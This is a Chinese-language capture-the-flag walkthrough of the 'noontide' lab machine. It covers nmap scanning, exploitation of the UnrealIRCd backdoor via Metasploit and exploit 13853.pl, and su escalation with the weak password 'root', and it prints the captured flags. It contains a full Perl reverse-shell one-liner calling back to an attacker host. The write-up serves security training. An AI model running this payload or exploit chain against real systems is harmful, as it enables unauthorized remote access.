1.探测靶机ip地址
ip a
netdiscover -i eth0 -r 192.168.100.0/24
可以看到靶机地址为192.168.100.165
2.nmap进行靶机端口服务扫描
nmap -sS -Pn -A -p- -n 192.168.100.165
-sS SYN 扫描,半连接
-Pn 跳过Ping扫描阶段
-A 全面扫描
-p- 全端口
-n 禁止DNS反向解析,如果单纯扫描一段IP,该选项可以大幅度减少目标主机响应时间
可以看到靶机开放了6667/irc、6697/irc、8067/irc端口,version都是UnrealIRCd
3.searchsploit搜索payload
searchsploit UnrealIRCd
可以看到第一个是msf的
4.漏洞利用
1.msf利用UnrealIRCd漏洞得到shell
msfconsole
search UnrealIRCd
使用这个exp
设置RHOSTS
set RHOSTS 192.168.100.165
查看能使用什么payload
show payloads
直接用第一个试试
set payload 0
查看下还需要配置啥
show options
没啥了,直接run
获得交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
进到用户下面查看flag
server@noontide:~/irc/Unreal3.2$ cd
cd
server@noontide:~$ ls -al
ls -al
total 40
drwxr-xr-x 4 server server 4096 Aug 8 2020 .
drwxr-xr-x 3 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 server server 220 Aug 8 2020 .bash_logout
-rw-r--r-- 1 server server 3526 Aug 8 2020 .bashrc
drwxr-xr-x 3 server server 4096 Aug 8 2020 irc
drwxr-xr-x 3 server server 4096 Aug 8 2020 .local
-rw-r--r-- 1 server server 33 Aug 8 2020 local.txt
-rw-r--r-- 1 server server 807 Aug 8 2020 .profile
-rw-r--r-- 1 server server 66 Aug 8 2020 .selected_editor
-rw-r--r-- 1 server server 173 Aug 8 2020 .wget-hsts
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
server@noontide:~$
su root使用弱口令root进入root用户
server@noontide:~$ su root
su root
Password: root
root@noontide:/home/server# cd
cd
root@noontide:~# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Aug 8 2020 .
drwxr-xr-x 18 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Aug 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 85 Aug 8 2020 proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
2.使用远程下载和执行payload
把13853.pl搞下来
searchsploit -m 13853.pl
vi 13853.pl
可以看到是从远程下载文件
可以使用msfvenon生成payload
msfvenom -l payloads | grep perl
msfvenom -p cmd/unix/reverse_perl LHOSTS=192.168.100.4 LPORT=12345 -f raw
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.100.4:12345");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
修改payload,将payload1修改为刚刚生成的
执行一下
perl 13853.pl 192.168.100.165 6667 1
成功反弹shell
生成交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
拿下
server@noontide:~/irc/Unreal3.2$ cd
cd
server@noontide:~$ ls -la
ls -la
total 40
drwxr-xr-x 4 server server 4096 Aug 8 2020 .
drwxr-xr-x 3 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 server server 220 Aug 8 2020 .bash_logout
-rw-r--r-- 1 server server 3526 Aug 8 2020 .bashrc
drwxr-xr-x 3 server server 4096 Aug 8 2020 irc
drwxr-xr-x 3 server server 4096 Aug 8 2020 .local
-rw-r--r-- 1 server server 33 Aug 8 2020 local.txt
-rw-r--r-- 1 server server 807 Aug 8 2020 .profile
-rw-r--r-- 1 server server 66 Aug 8 2020 .selected_editor
-rw-r--r-- 1 server server 173 Aug 8 2020 .wget-hsts
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
server@noontide:~$ su root
su root
Password: root
root@noontide:/home/server# cd
cd
root@noontide:~# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Aug 8 2020 .
drwxr-xr-x 18 root root 4096 Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Aug 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 85 Aug 8 2020 proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
5.靶场总结
nmap扫描 ---- searchsploit搜索payload ---- Metasploit利用UnrealIRCd漏洞得到shell / 修改已有payload ---- su命令弱密码提权
原文始发于微信公众号(CTS纵横安全实验室):noontide
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论